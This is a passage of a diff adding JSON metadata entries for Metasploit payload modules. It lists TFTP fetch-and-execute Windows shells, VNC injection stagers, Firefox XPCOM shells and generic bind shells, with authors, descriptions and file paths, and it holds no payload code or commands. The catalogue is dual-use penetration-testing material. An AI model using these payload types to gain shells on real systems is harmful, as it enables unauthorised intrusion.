Encryption, Metasm)", + "fullname": "payload/cmd/windows/tftp/x64/shell/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "hdm ", + "skape ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/shell/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/shell/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_tcp_rc4" + }, + "payload_cmd/windows/tftp/x64/shell/bind_tcp_uuid": { + "name": "TFTP Fetch, Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/tftp/x64/shell/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/shell/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/shell/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_cmd/windows/tftp/x64/shell/reverse_tcp": { + "name": "TFTP Fetch, Windows x64 Command Shell, Windows x64 Reverse TCP Stager", + "fullname": "payload/cmd/windows/tftp/x64/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/shell/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_cmd/windows/tftp/x64/shell/reverse_tcp_rc4": { + "name": "TFTP Fetch, Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/tftp/x64/shell/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "hdm ", + "skape ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/shell/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/shell/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_cmd/windows/tftp/x64/shell/reverse_tcp_uuid": { + "name": "TFTP Fetch, Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/tftp/x64/shell/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/shell/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/shell/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/shell", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_cmd/windows/tftp/x64/shell_bind_tcp": { + "name": "TFTP Fetch, Windows x64 Command Shell, Bind TCP Inline", + "fullname": "payload/cmd/windows/tftp/x64/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a connection and spawn a command shell (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/shell_bind_tcp", + "staged": false + }, + "payload_cmd/windows/tftp/x64/shell_reverse_tcp": { + "name": "TFTP Fetch, Windows x64 Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/windows/tftp/x64/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to attacker and spawn a command shell (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/windows/tftp/x64/vncinject/bind_ipv6_tcp": { + "name": "TFTP Fetch, Windows x64 IPv6 Bind TCP Stager", + "fullname": "payload/cmd/windows/tftp/x64/vncinject/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for an IPv6 connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/vncinject/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/vncinject/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_ipv6_tcp" + }, + "payload_cmd/windows/tftp/x64/vncinject/bind_ipv6_tcp_uuid": { + "name": "TFTP Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/tftp/x64/vncinject/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for an IPv6 connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/vncinject/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/vncinject/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/tftp/x64/vncinject/bind_named_pipe": { + "name": "TFTP Fetch, Windows x64 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/tftp/x64/vncinject/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "UserExistsError" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a pipe connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/vncinject/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/vncinject/bind_named_pipe", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_named_pipe" + }, + "payload_cmd/windows/tftp/x64/vncinject/bind_tcp": { + "name": "TFTP Fetch, Windows x64 Bind TCP Stager", + "fullname": "payload/cmd/windows/tftp/x64/vncinject/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a connection (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/vncinject/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/vncinject/bind_tcp", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_tcp" + }, + "payload_cmd/windows/tftp/x64/vncinject/bind_tcp_rc4": { + "name": "TFTP Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/tftp/x64/vncinject/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "hdm ", + "skape ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/vncinject/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/vncinject/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_tcp_rc4" + }, + "payload_cmd/windows/tftp/x64/vncinject/bind_tcp_uuid": { + "name": "TFTP Fetch, Bind TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/tftp/x64/vncinject/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nListen for a connection with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/vncinject/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/vncinject/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/bind_tcp_uuid" + }, + "payload_cmd/windows/tftp/x64/vncinject/reverse_http": { + "name": "TFTP Fetch, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/tftp/x64/vncinject/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/vncinject/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/vncinject/reverse_http", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_http" + }, + "payload_cmd/windows/tftp/x64/vncinject/reverse_https": { + "name": "TFTP Fetch, Windows x64 Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/tftp/x64/vncinject/reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "hdm ", + "agix", + "rwincey" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nTunnel communication over HTTP (Windows x64 wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/vncinject/reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/vncinject/reverse_https", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_https" + }, + "payload_cmd/windows/tftp/x64/vncinject/reverse_tcp": { + "name": "TFTP Fetch, Windows x64 Reverse TCP Stager", + "fullname": "payload/cmd/windows/tftp/x64/vncinject/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf " + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/vncinject/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/vncinject/reverse_tcp", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_tcp" + }, + "payload_cmd/windows/tftp/x64/vncinject/reverse_tcp_rc4": { + "name": "TFTP Fetch, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/tftp/x64/vncinject/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "hdm ", + "skape ", + "mihi", + "max3raza", + "RageLtMan" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/vncinject/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/vncinject/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_tcp_rc4" + }, + "payload_cmd/windows/tftp/x64/vncinject/reverse_tcp_uuid": { + "name": "TFTP Fetch, Reverse TCP Stager with UUID Support (Windows x64)", + "fullname": "payload/cmd/windows/tftp/x64/vncinject/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nConnect back to the attacker with UUID Support (Windows x64)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/vncinject/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/vncinject/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_tcp_uuid" + }, + "payload_cmd/windows/tftp/x64/vncinject/reverse_winhttp": { + "name": "TFTP Fetch, Windows x64 Reverse HTTP Stager (winhttp)", + "fullname": "payload/cmd/windows/tftp/x64/vncinject/reverse_winhttp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nTunnel communication over HTTP (Windows x64 winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/vncinject/reverse_winhttp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/vncinject/reverse_winhttp", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_winhttp" + }, + "payload_cmd/windows/tftp/x64/vncinject/reverse_winhttps": { + "name": "TFTP Fetch, Windows x64 Reverse HTTPS Stager (winhttp)", + "fullname": "payload/cmd/windows/tftp/x64/vncinject/reverse_winhttps", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "sf ", + "OJ Reeves" + ], + "description": "Fetch and execute an x64 payload from a TFTP server.\nTunnel communication over HTTPS (Windows x64 winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-01-03 14:46:15 +0000", + "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb", + "is_install_path": true, + "ref_name": "cmd/windows/tftp/x64/vncinject/reverse_winhttps", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/tftp/x64", + "adapted_refname": "windows/x64/vncinject/reverse_winhttps", + "staged": true, + "stage_refname": "windows/x64/vncinject", + "stager_refname": "windows/x64/reverse_winhttps" + }, + "payload_firefox/exec": { + "name": "Firefox XPCOM Execute Command", + "fullname": "payload/firefox/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "joev " + ], + "description": "This module runs a shell command on the target OS without touching the disk.\n On Windows, this command will flash the command prompt momentarily.\n This can be avoided by setting WSCRIPT to true, which drops a jscript\n \"launcher\" to disk that hides the prompt.", + "references": [], + "platform": "Firefox", + "arch": "firefox", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/firefox/exec.rb", + "is_install_path": true, + "ref_name": "firefox/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_firefox/shell_bind_tcp": { + "name": "Command Shell, Bind TCP (via Firefox XPCOM script)", + "fullname": "payload/firefox/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "joev " + ], + "description": "Creates an interactive shell via Javascript with access to Firefox's XPCOM API", + "references": [], + "platform": "Firefox", + "arch": "firefox", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/firefox/shell_bind_tcp.rb", + "is_install_path": true, + "ref_name": "firefox/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_firefox/shell_reverse_tcp": { + "name": "Command Shell, Reverse TCP (via Firefox XPCOM script)", + "fullname": "payload/firefox/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "joev " + ], + "description": "Creates an interactive shell via Javascript with access to Firefox's XPCOM API", + "references": [], + "platform": "Firefox", + "arch": "firefox", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/firefox/shell_reverse_tcp.rb", + "is_install_path": true, + "ref_name": "firefox/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_generic/custom": { + "name": "Custom Payload", + "fullname": "payload/generic/custom", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "scriptjunkie " + ], + "description": "Use custom string or file as payload. Set either PAYLOADFILE or\n PAYLOADSTR.", + "references": [], + "platform": "All", + "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, java, ruby, dalvik, python, nodejs, firefox, zarch, r, riscv32be, riscv32le, riscv64be, riscv64le, loongarch64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/generic/custom.rb", + "is_install_path": true, + "ref_name": "generic/custom", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_generic/debug_trap": { + "name": "Generic x86 Debug Trap", + "fullname": "payload/generic/debug_trap", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "robert " + ], + "description": "Generate a debug trap in the target process", + "references": [], + "platform": "BSD,BSDi,Linux,OSX,Solaris,Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2025-04-20 02:57:34 +0000", + "path": "/modules/payloads/singles/generic/debug_trap.rb", + "is_install_path": true, + "ref_name": "generic/debug_trap", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_generic/shell_bind_aws_ssm": { + "name": "Command Shell, Bind SSM (via AWS API)", + "fullname": "payload/generic/shell_bind_aws_ssm", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "RageLtMan " + ], + "description": "Creates an interactive shell using AWS SSM", + "references": [ + "URL-https://www.sempervictus.com/single-post/once-upon-a-cloudy-air-i-crossed-a-gap-which-wasn-t-there" + ], + "platform": "All", + "arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r, riscv32be, riscv32le, riscv64be, riscv64le, loongarch64", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2024-07-24 16:42:43 +0000", + "path": "/modules/payloads/singles/generic/shell_bind_aws_ssm.rb", + "is_install_path": true, + "ref_name": "generic/shell_bind_aws_ssm", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 1, + "staged": false + }, + "payload_generic/shell_bind_tcp": { + "name": "Generic Command Shell, Bind TCP Inline", + "fullname": "payload/generic/shell_bind_tcp", + "aliases": [], + "rank": 300, + 